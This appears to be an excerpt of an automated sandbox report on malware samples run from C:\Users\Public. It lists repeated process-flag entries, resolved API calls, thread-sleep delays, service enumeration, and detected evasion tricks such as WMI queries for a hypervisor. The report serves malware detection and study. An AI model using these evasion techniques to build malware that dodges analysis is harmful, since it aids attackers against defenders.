Code function: 28_2_1BA25E5E GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

28_2_1BA25E5E

Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\xkn.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\alpha.exe	Process information set: NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\sppsvc.pif	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\taskkill.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 28_2_1B9FF7A7 Sleep,ExitProcess,		28_2_1B9FF7A7
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: 36_2_2106F7A7 Sleep,ExitProcess,		36_2_2106F7A7

Source: C:\Users\Public\Libraries\Kpeyvroh.PIF

Evasive API call chain: GetPEB, DecisionNodes, ExitProcess

Source: c:\users\public\xkn.exe

Key value queried: Powershell behavior

Jump to behavior

Source: C:\Users\Public\xkn.exe	Memory allocated: 15A30F30000 memory reserve | memory write watch			Jump to behavior
Source: C:\Users\Public\xkn.exe	Memory allocated: 15A32730000 memory reserve | memory write watch			Jump to behavior

Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		28_2_1BA0A748
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		36_2_2107A748

Source: C:\Users\Public\xkn.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Users\Public\xkn.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Users\Public\xkn.exe	Window / User API: threadDelayed 3177			Jump to behavior
Source: C:\Users\Public\xkn.exe	Window / User API: threadDelayed 1694			Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Window / User API: threadDelayed 380
Source: C:\Users\Public\Libraries\sppsvc.pif	Window / User API: threadDelayed 9329
Source: C:\Users\Public\Libraries\sppsvc.pif	Window / User API: foregroundWindowGot 1751

Source: C:\Users\Public\alpha.exe	Evaded block: after key decision
Source: C:\Users\Public\alpha.exe	Evaded block: after key decision
Source: C:\Users\Public\alpha.exe	Evaded block: after key decision

Source: C:\Users\Public\alpha.exe	API coverage: 8.3 %
Source: C:\Users\Public\alpha.exe	API coverage: 8.1 %
Source: C:\Users\Public\kn.exe	API coverage: 0.8 %
Source: C:\Users\Public\Libraries\sppsvc.pif	API coverage: 10.0 %
Source: C:\Users\Public\alpha.exe	API coverage: 9.6 %
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF	API coverage: 6.5 %

Source: C:\Users\Public\xkn.exe TID: 5036	Thread sleep count: 3177 > 30			Jump to behavior
Source: C:\Users\Public\xkn.exe TID: 5036	Thread sleep count: 1694 > 30			Jump to behavior
Source: C:\Users\Public\xkn.exe TID: 7960	Thread sleep time: -4611686018427385s >= -30000s			Jump to behavior
Source: C:\Users\Public\xkn.exe TID: 5704	Thread sleep time: -922337203685477s >= -30000s			Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif TID: 8048	Thread sleep time: -58500s >= -30000s
Source: C:\Users\Public\Libraries\sppsvc.pif TID: 4780	Thread sleep time: -1140000s >= -30000s
Source: C:\Users\Public\Libraries\sppsvc.pif TID: 4780	Thread sleep time: -27987000s >= -30000s

Source: C:\Users\Public\alpha.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT HypervisorPresent FROM Win32_ComputerSystem

Source: C:\Users\Public\alpha.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Family,VirtualizationFirmwareEnabled FROM Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BD823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,		4_2_00007FF789BD823C
Source: C:\Users\Public\alpha.exe	Code function: 4_2_00007FF789BD2978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,		4_2_00007FF789BD2978
